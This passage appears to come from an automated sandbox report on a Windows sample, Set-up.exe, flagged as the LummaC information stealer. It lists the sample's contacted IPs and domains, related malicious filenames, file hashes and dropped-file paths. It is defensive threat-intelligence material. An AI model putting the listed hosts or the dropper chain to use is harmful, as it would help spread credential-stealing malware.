                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Set-up.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@59/15@4/3
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:Failed
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target BrightLib.exe, PID 2176 because there are no executed function
                                                                                                                          • Execution Graph export aborted for target Set-up.exe, PID 7160 because there are no executed function
                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6172 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          12:08:21API Interceptor10x Sleep call for process: Set-up.exe modified
                                                                                                                          12:08:31API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                          12:09:23API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          185.161.251.21SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          172.67.208.58Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      cegu.shopSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      klipvumisui.shopSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128
                                                                                                                                                      #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.37.128

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 188.114.96.3
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.90.109
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.196.191
                                                                                                                                                      momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 172.71.176.132
                                                                                                                                                      NTLGBSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 82.18.222.135
                                                                                                                                                      momo.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 82.17.192.171
                                                                                                                                                      momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 82.128.104.220
                                                                                                                                                      momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 86.15.30.49
                                                                                                                                                      z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 86.17.1.179
                                                                                                                                                      z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 81.99.50.70
                                                                                                                                                      CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 188.114.96.3
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.90.109
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.196.191
                                                                                                                                                      momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      momo.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 1.1.1.1
                                                                                                                                                      z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 172.71.176.132

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21
                                                                                                                                                      ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.208.58
                                                                                                                                                      • 104.21.21.63
                                                                                                                                                      • 185.161.251.21

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmpSET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                              MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                              SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                              SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                              SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:@...e.................................,..............@..........

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):8767044
                                                                                                                                                                                              Entropy (8bit):7.960152326344281
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                              MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                              SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                              SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                              SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdvgchl2.hem.ps1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4twivy2.om0.psm1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neflcqvg.tng.ps1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziliozwe.mdj.psm1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\f5360217

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                              File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6447207
                                                                                                                                                                                              Entropy (8bit):7.998441497232368
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                              MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                              SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                              SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                              SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-DND4F.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                              Malicious:true
